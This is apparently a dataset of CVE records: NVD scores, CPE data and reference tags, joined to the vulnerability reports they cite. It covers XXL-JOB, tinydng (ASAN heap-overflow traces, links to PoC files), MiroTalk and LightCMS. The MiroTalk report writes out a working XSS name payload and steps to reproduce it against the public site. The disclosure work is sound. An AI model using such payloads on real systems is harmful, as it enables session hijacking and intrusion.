้šๅŽ็›ดๆŽฅ่ฐƒ็”จcreateQuery()่ฟ›่กŒๆŸฅ่ฏข ![sql1_4](https://user-images.githubusercontent.com/97539349/225797085-5b1ab7e7-a26a-4d0f-82e4-fda131ed3975.png) The end,thanks!
There is a SQL injection vulnerability in the/admin/robot/approval/list interface of the rebuild system
https://api.github.com/repos/getrebuild/rebuild/issues/594/comments
2
2023-03-17T03:22:03Z
2023-03-18T02:24:38Z
https://github.com/getrebuild/rebuild/issues/594
1,628,623,335
594
4,868
CVE-2023-27087
2023-03-21T19:15:11.607
Permissions vulnerabiltiy found in Xuxueli xxl-job v2.2.0, v 2.3.0 and v.2.3.1 allows attacker to obtain sensitive information via the pageList parameter.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/xuxueli/xxl-job/issues/3096" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/xuxueli/xxl-job/issues/3096" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:xuxueli:xxl-job:2.2.0:*:*:*:*:*:*:*", "matchCriteriaId": "C7AE69F1-6781-47B8-933D-989F4EF5ED19", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:xuxueli:xxl-job:2.3.0:*:*:*:*:*:*:*", "matchCriteriaId": "233AAF33-91ED-425F-951A-1DAAC0B3A4C5", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:xuxueli:xxl-job:2.3.1:*:*:*:*:*:*:*", "matchCriteriaId": "3F9E9173-1AD8-4DFA-8AC2-7C91E73635D3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "280" ]
280
https://github.com/xuxueli/xxl-job/issues/3096
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "xuxueli", "xxl-job" ]
Vertical overreach vulnerability exists in XXL-JOB The defect code is as follows v2.2.0ใ€v2.3.0ใ€v2.3.1 ![image](https://user-images.githubusercontent.com/110451039/220047413-f6e1720d-ea46-406b-82a0-85192041fd4d.png)
XXL-JOB Vertical Overreach vulnerability
https://api.github.com/repos/xuxueli/xxl-job/issues/3096/comments
2
2023-02-20T08:05:04Z
2025-03-13T13:48:25Z
https://github.com/xuxueli/xxl-job/issues/3096
1,591,349,265
3,096
4,869
CVE-2023-1570
2023-03-22T15:15:10.187
A vulnerability, which was classified as problematic, has been found in syoyo tinydng. Affected by this issue is the function __interceptor_memcpy of the file tiny_dng_loader.h. The manipulation leads to heap-based buffer overflow. Local access is required to approach this attack. The exploit has been disclosed to the public and may be used. Continious delivery with rolling releases is used by this product. Therefore, no version details of affected nor updated releases are available. It is recommended to apply a patch to fix this issue. VDB-223562 is the identifier assigned to this vulnerability.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 1.7, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:L/AC:L/Au:S/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 3.1, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "LOW", "baseScore": 3.3, "baseSeverity": "LOW", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 1.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cna@vuldb.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/10cksYiqiyinHangzhouTechnology/tinydngSecurityIssueReport1" }, { "source": "cna@vuldb.com", "tags": [ "Exploit", "Issue Tracking", "Patch", "Vendor Advisory" ], "url": "https://github.com/syoyo/tinydng/issues/28" }, { "source": "cna@vuldb.com", "tags": [ "Exploit", "Issue Tracking", "Vendor Advisory" ], "url": "https://github.com/syoyo/tinydng/issues/29" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required", "Third Party Advisory" ], "url": "https://vuldb.com/?ctiid.223562" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?id.223562" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/10cksYiqiyinHangzhouTechnology/tinydngSecurityIssueReport1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Vendor Advisory" ], "url": "https://github.com/syoyo/tinydng/issues/28" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Vendor Advisory" ], "url": "https://github.com/syoyo/tinydng/issues/29" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Permissions Required", "Third Party Advisory" ], "url": "https://vuldb.com/?ctiid.223562" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?id.223562" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:tinydng_project:tinydng:*:*:*:*:*:*:*:*", "matchCriteriaId": "6E49821A-82C1-4C71-9F93-4CCEFCAC8BD0", "versionEndExcluding": "2023-02-20", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "122" ]
122
https://github.com/syoyo/tinydng/issues/28
[ "Exploit", "Issue Tracking", "Patch", "Vendor Advisory" ]
github.com
[ "syoyo", "tinydng" ]
**AddressSanitizer: heap-buffer-overflow in __interceptor_memcpy** READ of size 6927 at 0x619000000430 thread T0 [Poc file](https://github.com/10cksYiqiyinHangzhouTechnology/tinydngSecurityIssueReport1/blob/main/id13) [ASAN_tinydng](https://github.com/10cksYiqiyinHangzhouTechnology/tinydngSecurityIssueReport1/blob/main/asan_tinydng) ASAN Report: ``` ubuntu@ubuntu:~/Desktop/tinydng/out/default/crashes$ ~/Desktop/tinydng/asan_tinydng id:000013,sig:11,src:000603,time:45067989,execs:9583622,op:havoc,rep:2 ================================================================= ==3260705==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x619000000430 at pc 0x7ffff7620490 bp 0x7fffffff2f40 sp 0x7fffffff26e8 READ of size 6927 at 0x619000000430 thread T0 #0 0x7ffff762048f in __interceptor_memcpy ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:790 #1 0x555555564927 in memcpy /usr/include/x86_64-linux-gnu/bits/string_fortified.h:34 #2 0x555555564927 in stbi__getn /home/ubuntu/Desktop/tinydng/stb_image.h:1623 #3 0x55555558d95c in stbi__tga_load /home/ubuntu/Desktop/tinydng/stb_image.h:5756 #4 0x55555558d95c in stbi__load_main /home/ubuntu/Desktop/tinydng/stb_image.h:1124 #5 0x55555558f624 in stbi__load_and_postprocess_8bit /home/ubuntu/Desktop/tinydng/stb_image.h:1203 #6 0x55555558fe00 in stbi_load_from_memory /home/ubuntu/Desktop/tinydng/stb_image.h:1373 #7 0x5555555b1007 in tinydng::LoadDNGFromMemory(char const*, unsigned int, std::vector<tinydng::FieldInfo, std::allocator<tinydng::FieldInfo> >&, std::vector<tinydng::DNGImage, std::allocator<tinydng::DNGImage> >*, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >*, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >*) /home/ubuntu/Desktop/tinydng/tiny_dng_loader.h:5478 #8 0x5555555ba586 in tinydng::LoadDNG(char const*, std::vector<tinydng::FieldInfo, std::allocator<tinydng::FieldInfo> >&, std::vector<tinydng::DNGImage, std::allocator<tinydng::DNGImage> >*, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >*, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >*) /home/ubuntu/Desktop/tinydng/tiny_dng_loader.h:4937 #9 0x5555555baf87 in main /home/ubuntu/Desktop/tinydng/test.cpp:33 #10 0x7ffff706b082 in __libc_start_main ../csu/libc-start.c:308 #11 0x55555555dd6d in _start (/home/ubuntu/Desktop/tinydng/asan_tinydng+0x9d6d) 0x619000000430 is located 0 bytes to the right of 944-byte region [0x619000000080,0x619000000430) allocated by thread T0 here: #0 0x7ffff7694587 in operator new(unsigned long) ../../../../src/libsanitizer/asan/asan_new_delete.cc:104 #1 0x5555555c01bb in __gnu_cxx::new_allocator<unsigned char>::allocate(unsigned long, void const*) /usr/include/c++/9/ext/new_allocator.h:114 #2 0x5555555c01bb in std::allocator_traits<std::allocator<unsigned char> >::allocate(std::allocator<unsigned char>&, unsigned long) /usr/include/c++/9/bits/alloc_traits.h:443 #3 0x5555555c01bb in std::_Vector_base<unsigned char, std::allocator<unsigned char> >::_M_allocate(unsigned long) /usr/include/c++/9/bits/stl_vector.h:343 #4 0x5555555c01bb in std::vector<unsigned char, std::allocator<unsigned char> >::_M_default_append(unsigned long) /usr/include/c++/9/bits/vector.tcc:635 #5 0x5555555ba457 in std::vector<unsigned char, std::allocator<unsigned char> >::resize(unsigned long) /usr/include/c++/9/bits/stl_vector.h:937 #6 0x5555555ba457 in tinydng::LoadDNG(char const*, std::vector<tinydng::FieldInfo, std::allocator<tinydng::FieldInfo> >&, std::vector<tinydng::DNGImage, std::allocator<tinydng::DNGImage> >*, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >*, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >*) /home/ubuntu/Desktop/tinydng/tiny_dng_loader.h:4923 #7 0x5555555baf87 in main /home/ubuntu/Desktop/tinydng/test.cpp:33 #8 0x7ffff706b082 in __libc_start_main ../csu/libc-start.c:308 SUMMARY: AddressSanitizer: heap-buffer-overflow ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:790 in __interceptor_memcpy Shadow bytes around the buggy address: 0x0c327fff8030: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c327fff8040: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c327fff8050: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c327fff8060: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c327fff8070: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c327fff8080: 00 00 00 00 00 00[fa]fa fa fa fa fa fa fa fa fa 0x0c327fff8090: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c327fff80a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c327fff80b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c327fff80c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c327fff80d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==3260705==ABORTING ```
[Security Issue Report] heap-buffer-overflow
https://api.github.com/repos/syoyo/tinydng/issues/28/comments
0
2023-02-20T12:18:23Z
2023-02-20T12:34:15Z
https://github.com/syoyo/tinydng/issues/28
1,591,753,320
28
4,870
CVE-2023-1570
2023-03-22T15:15:10.187
A vulnerability, which was classified as problematic, has been found in syoyo tinydng. Affected by this issue is the function __interceptor_memcpy of the file tiny_dng_loader.h. The manipulation leads to heap-based buffer overflow. Local access is required to approach this attack. The exploit has been disclosed to the public and may be used. Continious delivery with rolling releases is used by this product. Therefore, no version details of affected nor updated releases are available. It is recommended to apply a patch to fix this issue. VDB-223562 is the identifier assigned to this vulnerability.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 1.7, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:L/AC:L/Au:S/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 3.1, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "LOW", "baseScore": 3.3, "baseSeverity": "LOW", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 1.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cna@vuldb.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/10cksYiqiyinHangzhouTechnology/tinydngSecurityIssueReport1" }, { "source": "cna@vuldb.com", "tags": [ "Exploit", "Issue Tracking", "Patch", "Vendor Advisory" ], "url": "https://github.com/syoyo/tinydng/issues/28" }, { "source": "cna@vuldb.com", "tags": [ "Exploit", "Issue Tracking", "Vendor Advisory" ], "url": "https://github.com/syoyo/tinydng/issues/29" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required", "Third Party Advisory" ], "url": "https://vuldb.com/?ctiid.223562" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?id.223562" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/10cksYiqiyinHangzhouTechnology/tinydngSecurityIssueReport1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Vendor Advisory" ], "url": "https://github.com/syoyo/tinydng/issues/28" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Vendor Advisory" ], "url": "https://github.com/syoyo/tinydng/issues/29" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Permissions Required", "Third Party Advisory" ], "url": "https://vuldb.com/?ctiid.223562" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?id.223562" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:tinydng_project:tinydng:*:*:*:*:*:*:*:*", "matchCriteriaId": "6E49821A-82C1-4C71-9F93-4CCEFCAC8BD0", "versionEndExcluding": "2023-02-20", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "122" ]
122
https://github.com/syoyo/tinydng/issues/29
[ "Exploit", "Issue Tracking", "Vendor Advisory" ]
github.com
[ "syoyo", "tinydng" ]
AddressSanitizer: heap-buffer-overflow in __interceptor_memcpy READ of size 1 at 0x61c000000708 thread T0 [Poc file](https://github.com/10cksYiqiyinHangzhouTechnology/tinydngSecurityIssueReport2/blob/main/id19) [ASAN_tinydng](https://github.com/10cksYiqiyinHangzhouTechnology/tinydngSecurityIssueReport2/blob/main/asan_tinydng) ASAN Report: ``` ubuntu@ubuntu:~/Desktop/tinydng/out/default/crashes$ ~/Desktop/tinydng/asan_tinydng id:000019,sig:11,src:000509,time:63211643,execs:13272738,op:havoc,rep:8 ================================================================= ==3709290==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61c000000708 at pc 0x55555558e4c0 bp 0x7fffffff2f90 sp 0x7fffffff2f80 READ of size 1 at 0x61c000000708 thread T0 #0 0x55555558e4bf in stbi__get8 /home/ubuntu/Desktop/tinydng/stb_image.h:1557 #1 0x55555558e4bf in stbi__tga_load /home/ubuntu/Desktop/tinydng/stb_image.h:5797 #2 0x55555558e4bf in stbi__load_main /home/ubuntu/Desktop/tinydng/stb_image.h:1124 #3 0x55555558f624 in stbi__load_and_postprocess_8bit /home/ubuntu/Desktop/tinydng/stb_image.h:1203 #4 0x55555558fe00 in stbi_load_from_memory /home/ubuntu/Desktop/tinydng/stb_image.h:1373 #5 0x5555555b1007 in tinydng::LoadDNGFromMemory(char const*, unsigned int, std::vector<tinydng::FieldInfo, std::allocator<tinydng::FieldInfo> >&, std::vector<tinydng::DNGImage, std::allocator<tinydng::DNGImage> >*, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >*, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >*) /home/ubuntu/Desktop/tinydng/tiny_dng_loader.h:5478 #6 0x5555555ba586 in tinydng::LoadDNG(char const*, std::vector<tinydng::FieldInfo, std::allocator<tinydng::FieldInfo> >&, std::vector<tinydng::DNGImage, std::allocator<tinydng::DNGImage> >*, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >*, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >*) /home/ubuntu/Desktop/tinydng/tiny_dng_loader.h:4937 #7 0x5555555baf87 in main /home/ubuntu/Desktop/tinydng/test.cpp:33 #8 0x7ffff706b082 in __libc_start_main ../csu/libc-start.c:308 #9 0x55555555dd6d in _start (/home/ubuntu/Desktop/tinydng/asan_tinydng+0x9d6d) 0x61c000000708 is located 0 bytes to the right of 1672-byte region [0x61c000000080,0x61c000000708) allocated by thread T0 here: #0 0x7ffff7694587 in operator new(unsigned long) ../../../../src/libsanitizer/asan/asan_new_delete.cc:104 #1 0x5555555c01bb in __gnu_cxx::new_allocator<unsigned char>::allocate(unsigned long, void const*) /usr/include/c++/9/ext/new_allocator.h:114 #2 0x5555555c01bb in std::allocator_traits<std::allocator<unsigned char> >::allocate(std::allocator<unsigned char>&, unsigned long) /usr/include/c++/9/bits/alloc_traits.h:443 #3 0x5555555c01bb in std::_Vector_base<unsigned char, std::allocator<unsigned char> >::_M_allocate(unsigned long) /usr/include/c++/9/bits/stl_vector.h:343 #4 0x5555555c01bb in std::vector<unsigned char, std::allocator<unsigned char> >::_M_default_append(unsigned long) /usr/include/c++/9/bits/vector.tcc:635 #5 0x5555555ba457 in std::vector<unsigned char, std::allocator<unsigned char> >::resize(unsigned long) /usr/include/c++/9/bits/stl_vector.h:937 #6 0x5555555ba457 in tinydng::LoadDNG(char const*, std::vector<tinydng::FieldInfo, std::allocator<tinydng::FieldInfo> >&, std::vector<tinydng::DNGImage, std::allocator<tinydng::DNGImage> >*, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >*, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >*) /home/ubuntu/Desktop/tinydng/tiny_dng_loader.h:4923 #7 0x5555555baf87 in main /home/ubuntu/Desktop/tinydng/test.cpp:33 #8 0x7ffff706b082 in __libc_start_main ../csu/libc-start.c:308 SUMMARY: AddressSanitizer: heap-buffer-overflow /home/ubuntu/Desktop/tinydng/stb_image.h:1557 in stbi__get8 Shadow bytes around the buggy address: 0x0c387fff8090: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c387fff80a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c387fff80b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c387fff80c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c387fff80d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c387fff80e0: 00[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c387fff80f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c387fff8100: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c387fff8110: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c387fff8120: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c387fff8130: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==3709290==ABORTING ```
[Security Issue Report] heap-buffer-overflow
https://api.github.com/repos/syoyo/tinydng/issues/29/comments
1
2023-02-20T12:25:16Z
2023-02-20T12:35:56Z
https://github.com/syoyo/tinydng/issues/29
1,591,766,233
29
4,871
CVE-2023-27054
2023-03-22T22:15:12.490
A cross-site scripting (XSS) vulnerability in MiroTalk P2P before commit f535b35 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name parameter under the settings module.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Product" ], "url": "https://github.com/miroslavpejic85/mirotalk" }, { "source": "cve@mitre.org", "tags": [ "Patch" ], "url": "https://github.com/miroslavpejic85/mirotalk/commit/f535b3515d2d480dc3135b37982f5df93e43c592" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Vendor Advisory" ], "url": "https://github.com/miroslavpejic85/mirotalk/issues/139" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Product" ], "url": "https://github.com/miroslavpejic85/mirotalk" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch" ], "url": "https://github.com/miroslavpejic85/mirotalk/commit/f535b3515d2d480dc3135b37982f5df93e43c592" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Vendor Advisory" ], "url": "https://github.com/miroslavpejic85/mirotalk/issues/139" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:mirotalk:mirotalk_p2p:*:*:*:*:*:*:*:*", "matchCriteriaId": "45DFFCBF-0545-417D-BC59-32824D4F24B9", "versionEndExcluding": "2023-02-18", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/miroslavpejic85/mirotalk/issues/139
[ "Exploit", "Issue Tracking", "Patch", "Vendor Advisory" ]
github.com
[ "miroslavpejic85", "mirotalk" ]
### Describe the bug The mirotalk web application is susceptible to XSS. If two participants joined a web meeting, one participant can change their name, which is then reflected for all other meeting participants. Since no input validation takes place; or output filtering to sanitize maliciously choosen names, the payload of an attacker is executed in the browser of other victims. This can introduce various problems and attack vectors, such as: - Hijacking of user sessions - Defacing of the web site - Inserting malicious content into the response - Redirect users to malicious pages - Hijack the userโ€™s browser using malware ### To Reproduce Steps to reproduce the behavior: 1. Go to https://p2p.mirotalk.com/ and create a new room. Join the room yourself. 2. Start a second private browser window to simulate another user. Join the same room via invite link e.g. 3. After joining the meeting, change your name via settings to `<img src="x" onerror=alert(document.domain)>` 4. Verify a JavaScript popup in both browser meeting rooms. You successfully XSS'd other users. ### Expected behavior A meeting participant's name should always be sanitized before being displayed or embedded into the website's content. ### Screenshots ![image](https://user-images.githubusercontent.com/21357789/219805054-c41945ce-d570-47e7-80f3-01f8c1fbc1c2.png) ### Desktop - Mobile Please complete the following information: - Device or OS: Windows 10 - Browser: Microsoft Edge, likely any other browser affected too - Version: 110.0.1587.46 ### Additional context - https://owasp.org/www-community/attacks/xss/ - https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html ### Recommendation - Sanitize untrusted user inputs. - Define a security policy for this github repo to gain information on how to reach out to you about security issues Other from that, many thanks for this projects. Really, really cool!
Multiple Cross-Site Scripting (XSS)
https://api.github.com/repos/miroslavpejic85/mirotalk/issues/139/comments
14
2023-02-17T22:22:09Z
2023-02-19T20:31:58Z
https://github.com/miroslavpejic85/mirotalk/issues/139
1,590,026,697
139
4,872
CVE-2023-27060
2023-03-22T22:15:12.547
LightCMS v1.3.7 was discovered to contain a remote code execution (RCE) vulnerability via the image:make function.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary" } ], "cvssMetricV40": null }
